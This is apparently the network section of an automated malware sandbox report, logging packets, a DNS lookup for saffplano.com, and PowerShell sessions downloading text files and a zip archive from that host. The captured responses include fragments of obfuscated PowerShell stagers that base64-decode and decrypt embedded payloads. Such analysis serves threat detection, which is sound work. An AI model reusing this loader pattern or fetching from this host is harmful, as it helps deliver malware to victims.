                                                  Dec 31, 2024 18:00:06.237648964 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.237648964 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.237696886 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.237696886 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.237796068 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.237796068 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.237843990 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.237893105 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.237893105 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.237941980 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.237992048 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.237992048 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.237992048 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.238039970 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.238092899 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.238092899 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.238092899 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.238141060 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.238190889 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.238240004 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.238285065 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.344573975 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.344603062 CET44349715104.21.75.126192.168.11.20
                                                  Dec 31, 2024 18:00:06.344620943 CET44349715104.21.75.126192.168.11.20
                                                  Dec 31, 2024 18:00:06.344826937 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.344865084 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.344865084 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.344997883 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.344997883 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.345120907 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.357388020 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.357417107 CET44349715104.21.75.126192.168.11.20
                                                  Dec 31, 2024 18:00:06.357438087 CET44349715104.21.75.126192.168.11.20
                                                  Dec 31, 2024 18:00:06.357456923 CET44349715104.21.75.126192.168.11.20
                                                  Dec 31, 2024 18:00:06.357598066 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.357598066 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.357731104 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.357731104 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.357769012 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.357769012 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.357810974 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.357899904 CET44349715104.21.75.126192.168.11.20
                                                  Dec 31, 2024 18:00:06.357945919 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.357945919 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.357995033 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.357995033 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358069897 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358088017 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358136892 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358136892 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358186007 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358186007 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358336926 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358388901 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358388901 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358438015 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358486891 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358486891 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358584881 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358584881 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358633995 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358733892 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358733892 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358733892 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358766079 CET44349715104.21.75.126192.168.11.20
                                                  Dec 31, 2024 18:00:06.358782053 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358844995 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358894110 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358894110 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358942986 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358942986 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.358994961 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.359088898 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.359088898 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.359138012 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.359186888 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.359186888 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.359236002 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.359236002 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.359285116 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.359285116 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.359338045 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.359338045 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.359386921 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.359386921 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.359436035 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.359535933 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.462518930 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.462533951 CET44349715104.21.75.126192.168.11.20
                                                  Dec 31, 2024 18:00:06.462721109 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.462779045 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.485228062 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.587630987 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:06.627033949 CET49715443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:08.460515022 CET49716443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:08.460545063 CET44349716104.21.75.126192.168.11.20
                                                  Dec 31, 2024 18:00:08.460707903 CET49716443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:08.461014032 CET49716443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:08.461029053 CET44349716104.21.75.126192.168.11.20
                                                  Dec 31, 2024 18:00:08.727843046 CET44349716104.21.75.126192.168.11.20
                                                  Dec 31, 2024 18:00:08.728868961 CET49716443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:08.728883028 CET44349716104.21.75.126192.168.11.20
                                                  Dec 31, 2024 18:00:08.729121923 CET49716443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:08.729130983 CET44349716104.21.75.126192.168.11.20
                                                  Dec 31, 2024 18:00:09.664146900 CET44349716104.21.75.126192.168.11.20
                                                  Dec 31, 2024 18:00:09.664447069 CET44349716104.21.75.126192.168.11.20
                                                  Dec 31, 2024 18:00:09.664648056 CET49716443192.168.11.20104.21.75.126
                                                  Dec 31, 2024 18:00:09.667120934 CET49716443192.168.11.20104.21.75.126

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 31, 2024 17:59:45.962008953 CET6258553192.168.11.201.1.1.1
                                                  Dec 31, 2024 17:59:46.133158922 CET53625851.1.1.1192.168.11.20

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Dec 31, 2024 17:59:45.962008953 CET192.168.11.201.1.1.10xf07Standard query (0)saffplano.comA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 31, 2024 17:59:46.133158922 CET1.1.1.1192.168.11.200xf07No error (0)saffplano.com104.21.75.126A (IP address)IN (0x0001)false
                                                  Dec 31, 2024 17:59:46.133158922 CET1.1.1.1192.168.11.200xf07No error (0)saffplano.com172.67.175.217A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • saffplano.com

                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.11.2049713104.21.75.1264437204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-31 16:59:46 UTC191OUTGET /download/uploads/eERu1UrKpkUv.txt HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                  Host: saffplano.com
                                                  Connection: Keep-Alive
                                                  2024-12-31 16:59:47 UTC1039INHTTP/1.1 200 OK
                                                  Date: Tue, 31 Dec 2024 16:59:46 GMT
                                                  Content-Type: text/plain
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  last-modified: Thu, 26 Dec 2024 15:33:46 GMT
                                                  vary: Accept-Encoding
                                                  etag: W/"676d775a-7c9"
                                                  x-frame-options: SAMEORIGIN
                                                  x-content-type-options: nosniff
                                                  x-xss-protection: 1; mode=block
                                                  x-permitted-cross-domain-policies: master-only
                                                  referrer-policy: same-origin
                                                  alt-svc: h3=":443"; ma=86400
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=23m2AsLNBTfS2kr74w3p7puFqe9yhx5R7sXnXlIq54JW2DXtXxeZGJL0KwCQ8TGpr4oC%2B%2B8pNvrCwcREu9tr%2Bv9IWbPA28NUuHxAJ3sIJFu%2BcYhAhLySEDngRbQAcAmR"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8fabd27089270a22-MIA
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=129188&min_rtt=129103&rtt_var=27375&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=805&delivery_rate=29593&cwnd=244&unsent_bytes=0&cid=55642867411bd4c9&ts=649&x=0"
                                                  2024-12-31 16:59:47 UTC330INData Raw: 37 63 39 0d 0a 24 37 65 34 38 62 33 39 65 65 63 34 30 34 66 62 66 39 39 64 62 64 64 39 62 35 36 38 30 61 65 39 31 20 3d 20 22 71 55 34 4b 77 4e 64 68 44 46 69 48 79 74 52 47 34 6c 61 30 6a 32 47 78 70 77 2b 69 4f 42 5a 53 67 45 78 6a 6b 4d 58 44 51 31 76 4d 56 58 57 39 4f 4a 6a 68 70 76 6c 4f 73 66 59 64 64 2b 6a 59 42 71 45 64 53 67 51 2b 6b 76 62 62 34 4f 41 46 39 74 62 4b 46 2f 49 2b 57 6d 2f 72 56 38 44 6b 36 48 51 39 61 73 4b 7a 35 32 38 61 6d 64 7a 33 65 59 68 67 4d 66 4e 79 75 56 72 35 47 30 71 57 68 49 6f 44 5a 77 47 44 7a 6e 4b 2b 2b 7a 74 32 74 6c 50 32 2b 6a 45 58 7a 79 74 4e 35 30 56 50 61 4d 47 66 49 56 49 7a 48 33 39 70 47 50 4f 73 75 4b 2b 43 77 63 34 67 71 73 6c 48 48 31 57 44 56 78 69 41 74 63 49 35 43 75 34 43 52 47 51 73 4d 41 44 68 61
                                                  Data Ascii: 7c9$7e48b39eec404fbf99dbdd9b5680ae91 = "qU4KwNdhDFiHytRG4la0j2Gxpw+iOBZSgExjkMXDQ1vMVXW9OJjhpvlOsfYdd+jYBqEdSgQ+kvbb4OAF9tbKF/I+Wm/rV8Dk6HQ9asKz528amdz3eYhgMfNyuVr5G0qWhIoDZwGDznK++zt2tlP2+jEXzytN50VPaMGfIVIzH39pGPOsuK+Cwc4gqslHH1WDVxiAtcI5Cu4CRGQsMADha
                                                  2024-12-31 16:59:47 UTC1369INData Raw: 74 68 72 44 71 5a 4f 4a 68 33 30 36 6b 54 4a 6d 43 4a 43 33 68 64 72 6a 2f 51 49 62 46 4d 7a 37 53 59 4a 54 77 58 48 58 72 74 6d 37 43 44 41 44 37 2b 74 70 4a 36 39 37 34 53 75 75 4d 43 36 58 41 30 42 6f 4a 52 6d 70 32 4f 79 31 43 71 62 67 52 50 4e 2b 73 44 66 6d 7a 55 45 38 57 76 78 34 49 75 66 65 50 73 41 53 4b 62 77 6f 38 75 30 32 6d 48 71 57 35 5a 71 50 47 67 4e 45 6b 65 57 35 5a 68 72 43 61 4b 6a 74 52 53 33 6f 47 6b 41 4f 35 6f 63 75 79 34 7a 57 75 48 52 33 32 79 35 48 49 76 49 63 34 36 51 53 4d 36 6f 32 34 31 50 38 58 5a 72 6b 42 57 4b 56 30 46 59 43 32 61 43 35 49 34 50 75 47 30 71 4d 2f 6c 57 68 6a 47 73 33 4a 33 41 59 6c 46 31 72 55 39 77 76 46 4c 78 45 32 43 78 56 42 42 62 2f 62 35 4b 4f 71 42 6f 78 6f 34 7a 31 39 50 79 6b 74 2b 41 56 44 4e 56
                                                  Data Ascii: thrDqZOJh306kTJmCJC3hdrj/QIbFMz7SYJTwXHXrtm7CDAD7+tpJ6974SuuMC6XA0BoJRmp2Oy1CqbgRPN+sDfmzUE8Wvx4IufePsASKbwo8u02mHqW5ZqPGgNEkeW5ZhrCaKjtRS3oGkAO5ocuy4zWuHR32y5HIvIc46QSM6o241P8XZrkBWKV0FYC2aC5I4PuG0qM/lWhjGs3J3AYlF1rU9wvFLxE2CxVBBb/b5KOqBoxo4z19Pykt+AVDNV
                                                  2024-12-31 16:59:47 UTC301INData Raw: 30 31 35 65 66 33 36 34 36 31 20 3d 20 24 31 30 37 61 38 61 64 38 34 31 37 39 34 36 66 33 61 34 38 63 61 64 30 65 30 63 30 39 65 38 33 38 2e 54 72 61 6e 73 66 6f 72 6d 46 69 6e 61 6c 42 6c 6f 63 6b 28 24 33 61 64 65 39 39 33 30 34 38 32 31 34 66 32 35 38 32 31 36 38 35 66 30 37 64 37 35 37 33 37 31 2c 20 30 2c 20 24 33 61 64 65 39 39 33 30 34 38 32 31 34 66 32 35 38 32 31 36 38 35 66 30 37 64 37 35 37 33 37 31 2e 4c 65 6e 67 74 68 29 3b 0d 0a 24 66 63 37 65 39 34 34 32 63 34 33 66 34 62 38 32 61 33 64 32 63 39 32 63 35 31 39 31 30 39 37 65 20 3d 20 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 55 54 46 38 2e 47 65 74 53 74 72 69 6e 67 28 24 62 30 65 36 30 63 64 33 34 30 30 65 34 31 31 63 61 33 66 61 38 31 30 31 35 65 66 33 36 34
                                                  Data Ascii: 015ef36461 = $107a8ad8417946f3a48cad0e0c09e838.TransformFinalBlock($3ade993048214f25821685f07d757371, 0, $3ade993048214f25821685f07d757371.Length);$fc7e9442c43f4b82a3d2c92c5191097e = [System.Text.Encoding]::UTF8.GetString($b0e60cd3400e411ca3fa81015ef364
                                                  2024-12-31 16:59:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.11.2049714104.21.75.1264436420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-31 16:59:56 UTC192OUTGET /download/uploads/KciVS6w55td9u.txt HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                  Host: saffplano.com
                                                  Connection: Keep-Alive
                                                  2024-12-31 16:59:57 UTC1040INHTTP/1.1 200 OK
                                                  Date: Tue, 31 Dec 2024 16:59:57 GMT
                                                  Content-Type: text/plain
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  last-modified: Thu, 26 Dec 2024 15:33:45 GMT
                                                  vary: Accept-Encoding
                                                  etag: W/"676d7759-12f1"
                                                  x-frame-options: SAMEORIGIN
                                                  x-content-type-options: nosniff
                                                  x-xss-protection: 1; mode=block
                                                  x-permitted-cross-domain-policies: master-only
                                                  referrer-policy: same-origin
                                                  alt-svc: h3=":443"; ma=86400
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WOtDPyl%2FHE7mbDCDmreUdsJPyrWVto7rBsoIjAgxlqcQwZy0sMq6LgAGbtSP0yMUzni5eFUMYn0FPKCkbTwfOoz8VL84SZxsTjvai9j%2BQI%2B7mJ0%2FFLhhrJXtS1gJs3ai"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8fabd2b1cf41a554-MIA
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=129896&min_rtt=129797&rtt_var=27541&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=806&delivery_rate=29428&cwnd=252&unsent_bytes=0&cid=595aa5bcec3b4823&ts=652&x=0"
                                                  2024-12-31 16:59:57 UTC329INData Raw: 31 32 66 31 0d 0a 24 63 65 33 33 33 63 64 36 61 65 39 36 34 36 32 65 39 62 31 33 36 32 66 37 32 38 62 63 64 34 33 33 20 3d 20 22 75 6a 57 4e 48 49 72 32 78 52 4d 43 6e 50 43 62 56 2f 61 76 79 33 57 67 46 4c 54 37 79 61 39 6a 76 4b 4e 36 4f 4e 4f 43 79 69 67 52 49 35 75 5a 39 58 41 35 63 2b 37 72 51 65 73 53 46 79 4b 42 55 7a 6b 38 65 62 36 75 56 32 62 49 41 59 39 4c 2b 47 70 75 75 4c 53 77 4d 52 68 72 47 6f 68 51 37 65 78 62 6e 6c 4a 2b 61 32 74 65 53 6e 42 55 6b 73 70 4e 58 59 6e 5a 4c 2b 37 71 42 48 62 42 53 45 36 66 48 72 75 57 66 43 76 34 55 67 64 49 73 44 78 74 67 33 76 57 64 75 51 6b 61 4d 64 4d 66 69 63 32 6d 73 74 6e 73 33 77 33 70 47 4c 6b 5a 52 78 61 74 33 56 2f 67 41 33 66 7a 68 57 4c 51 37 57 6b 7a 44 79 36 71 39 38 2b 49 39 4a 59 4e 4c 35 37
                                                  Data Ascii: 12f1$ce333cd6ae96462e9b1362f728bcd433 = "ujWNHIr2xRMCnPCbV/avy3WgFLT7ya9jvKN6ONOCyigRI5uZ9XA5c+7rQesSFyKBUzk8eb6uV2bIAY9L+GpuuLSwMRhrGohQ7exbnlJ+a2teSnBUkspNXYnZL+7qBHbBSE6fHruWfCv4UgdIsDxtg3vWduQkaMdMfic2mstns3w3pGLkZRxat3V/gA3fzhWLQ7WkzDy6q98+I9JYNL57
                                                  2024-12-31 16:59:57 UTC1369INData Raw: 53 6f 75 34 70 4c 56 37 67 4d 56 73 52 62 48 52 67 55 56 62 50 59 50 6b 2b 65 59 7a 62 4d 38 74 35 31 38 48 44 6b 34 34 72 6a 50 4f 51 55 30 78 6d 78 52 67 68 47 54 34 51 44 76 71 4b 7a 67 4f 41 79 51 53 4d 41 61 56 71 39 71 73 6b 6e 36 56 68 73 37 4c 46 33 6a 6e 65 79 79 68 77 6a 48 43 6d 52 37 64 58 58 33 67 69 6a 6d 74 46 68 2b 5a 56 4d 6d 31 79 48 4f 6a 57 64 75 74 68 74 5a 32 30 79 41 33 62 63 53 79 4c 51 41 4b 34 68 4e 72 44 47 38 4b 34 32 4c 68 71 6f 72 41 53 4b 34 4b 50 4b 53 47 65 7a 72 72 77 6c 48 5a 41 52 59 43 37 44 78 4a 58 49 49 79 71 34 75 52 2b 61 6c 30 47 59 71 6b 74 43 62 59 78 34 4b 63 35 37 34 73 6f 35 74 67 4f 66 4d 34 45 6e 36 43 75 61 71 32 34 77 53 39 6b 67 43 33 4e 4f 47 71 70 55 78 6a 41 33 64 74 2b 43 2b 71 72 62 7a 61 44 49 73
                                                  Data Ascii: Sou4pLV7gMVsRbHRgUVbPYPk+eYzbM8t518HDk44rjPOQU0xmxRghGT4QDvqKzgOAyQSMAaVq9qskn6Vhs7LF3jneyyhwjHCmR7dXX3gijmtFh+ZVMm1yHOjWduthtZ20yA3bcSyLQAK4hNrDG8K42LhqorASK4KPKSGezrrwlHZARYC7DxJXIIyq4uR+al0GYqktCbYx4Kc574so5tgOfM4En6Cuaq24wS9kgC3NOGqpUxjA3dt+C+qrbzaDIs
                                                  2024-12-31 16:59:57 UTC1369INData Raw: 6e 4f 76 63 4c 47 79 69 56 33 4f 67 38 35 6b 42 66 76 79 36 47 61 63 47 41 2b 54 76 44 30 63 78 6f 4a 61 5a 32 4d 54 65 44 5a 32 77 33 49 57 47 34 71 52 45 61 4b 45 57 49 5a 37 73 48 47 50 6f 46 42 66 58 70 38 70 4b 64 74 77 50 43 7a 50 73 4c 34 51 47 70 4e 30 37 69 61 53 30 67 46 50 66 71 35 44 69 31 51 73 7a 71 42 6b 77 74 6f 6c 74 5a 68 2b 34 79 49 75 76 73 2b 73 52 50 55 46 30 75 4e 61 31 66 66 67 41 34 6a 72 46 49 71 55 76 33 73 43 4d 2f 79 6a 63 41 39 41 62 57 67 6d 57 41 4e 73 63 4c 36 58 77 45 30 2b 68 74 6b 30 66 6a 59 4d 4f 57 37 2f 57 79 6b 51 67 46 74 69 41 65 35 67 55 51 62 70 32 53 36 41 70 73 67 32 35 33 53 32 6e 48 7a 38 6d 64 34 6d 74 30 4e 4f 64 30 75 6f 61 50 6b 4e 68 32 79 4c 33 36 43 48 4a 71 7a 56 70 31 44 46 67 4c 38 6c 56 33 58 5a
                                                  Data Ascii: nOvcLGyiV3Og85kBfvy6GacGA+TvD0cxoJaZ2MTeDZ2w3IWG4qREaKEWIZ7sHGPoFBfXp8pKdtwPCzPsL4QGpN07iaS0gFPfq5Di1QszqBkwtoltZh+4yIuvs+sRPUF0uNa1ffgA4jrFIqUv3sCM/yjcA9AbWgmWANscL6XwE0+htk0fjYMOW7/WykQgFtiAe5gUQbp2S6Apsg253S2nHz8md4mt0NOd0uoaPkNh2yL36CHJqzVp1DFgL8lV3XZ
                                                  2024-12-31 16:59:57 UTC1369INData Raw: 4b 38 64 2f 45 78 57 6b 33 4f 66 74 6b 42 67 47 71 63 4f 68 42 6b 61 6f 59 63 32 54 31 33 5a 72 73 74 6e 4a 54 41 59 66 6b 59 4d 49 46 6b 53 6f 6e 73 5a 45 71 70 63 55 32 38 74 6f 58 6a 32 49 73 2f 31 4d 44 56 61 2b 35 61 45 69 5a 48 4a 76 34 4e 6f 74 54 75 4b 43 75 44 4d 50 72 6d 6c 53 75 4f 41 42 55 62 68 37 75 6e 35 69 7a 32 54 53 59 46 51 46 47 47 76 52 47 67 72 4f 69 65 42 73 4c 51 78 30 4a 62 67 37 4e 69 4e 34 32 42 54 41 2b 66 4f 53 61 62 77 30 49 6f 66 44 30 4c 45 6e 65 4f 49 4e 48 71 42 6c 50 61 34 6b 57 62 66 30 2f 34 30 74 65 64 62 34 55 54 6d 66 35 4e 62 52 54 78 51 51 30 63 6e 57 52 41 58 79 4d 72 4c 2b 44 70 47 37 64 7a 48 6e 74 75 69 6c 6b 69 4d 59 6e 57 5a 68 44 4f 69 66 6d 71 68 55 63 78 6e 4e 33 75 55 76 67 6f 32 78 46 33 52 50 7a 4d 36
                                                  Data Ascii: K8d/ExWk3OftkBgGqcOhBkaoYc2T13ZrstnJTAYfkYMIFkSonsZEqpcU28toXj2Is/1MDVa+5aEiZHJv4NotTuKCuDMPrmlSuOABUbh7un5iz2TSYFQFGGvRGgrOieBsLQx0Jbg7NiN42BTA+fOSabw0IofD0LEneOINHqBlPa4kWbf0/40tedb4UTmf5NbRTxQQ0cnWRAXyMrL+DpG7dzHntuilkiMYnWZhDOifmqhUcxnN3uUvgo2xF3RPzM6
                                                  2024-12-31 16:59:57 UTC421INData Raw: 34 33 34 30 34 66 39 37 37 31 34 63 31 34 35 32 63 66 61 61 38 66 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 24 63 65 33 33 33 63 64 36 61 65 39 36 34 36 32 65 39 62 31 33 36 32 66 37 32 38 62 63 64 34 33 33 29 3b 0d 0a 24 64 39 39 30 61 61 61 36 35 66 65 62 34 64 63 65 38 61 63 61 33 32 62 61 36 34 30 61 39 62 62 61 20 3d 20 24 32 34 36 65 65 31 64 37 66 33 39 34 34 61 66 37 62 30 34 63 33 36 34 34 63 38 38 30 33 39 61 33 2e 54 72 61 6e 73 66 6f 72 6d 46 69 6e 61 6c 42 6c 6f 63 6b 28 24 30 61 38 62 63 34 32 34 65 33 34 33 34 30 34 66 39 37 37 31 34 63 31 34 35 32 63 66 61 61 38 66 2c 20 30 2c 20 24 30 61 38 62 63 34 32 34 65 33 34 33 34 30 34 66 39 37 37 31 34 63 31 34 35 32 63 66 61
                                                  Data Ascii: 43404f97714c1452cfaa8f = [System.Convert]::FromBase64String($ce333cd6ae96462e9b1362f728bcd433);$d990aaa65feb4dce8aca32ba640a9bba = $246ee1d7f3944af7b04c3644c88039a3.TransformFinalBlock($0a8bc424e343404f97714c1452cfaa8f, 0, $0a8bc424e343404f97714c1452cfa
                                                  2024-12-31 16:59:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.11.2049715104.21.75.1264436420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-31 16:59:59 UTC152OUTGET /fsp/visionApps.zip HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                  Host: saffplano.com
                                                  2024-12-31 17:00:00 UTC995INHTTP/1.1 200 OK
                                                  Date: Tue, 31 Dec 2024 17:00:00 GMT
                                                  Content-Type: application/zip
                                                  Content-Length: 12455089
                                                  Connection: close
                                                  last-modified: Thu, 26 Dec 2024 01:34:34 GMT
                                                  vary: Accept-Encoding
                                                  etag: "676cb2aa-be0cb1"
                                                  expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                  Cache-Control: max-age=315360000
                                                  access-control-allow-origin: *
                                                  alt-svc: h3=":443"; ma=86400
                                                  CF-Cache-Status: MISS
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mXEbl7tmXe%2BYWkTag%2FssIn82TMTFIUR0Vp9iyJ%2Bn6%2FKhY31r3FcUVatPXm1pyVBRMyxG0P97qdKhc8GAh1XLI1lhNjpp9d8ptPbWYAwlRpkdrnrhx61dzpC1lEBYkpq0"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8fabd2c39f3b7475-MIA
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=129818&min_rtt=129463&rtt_var=27490&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=790&delivery_rate=29518&cwnd=252&unsent_bytes=0&cid=47962b9d17c6f8a5&ts=870&x=0"
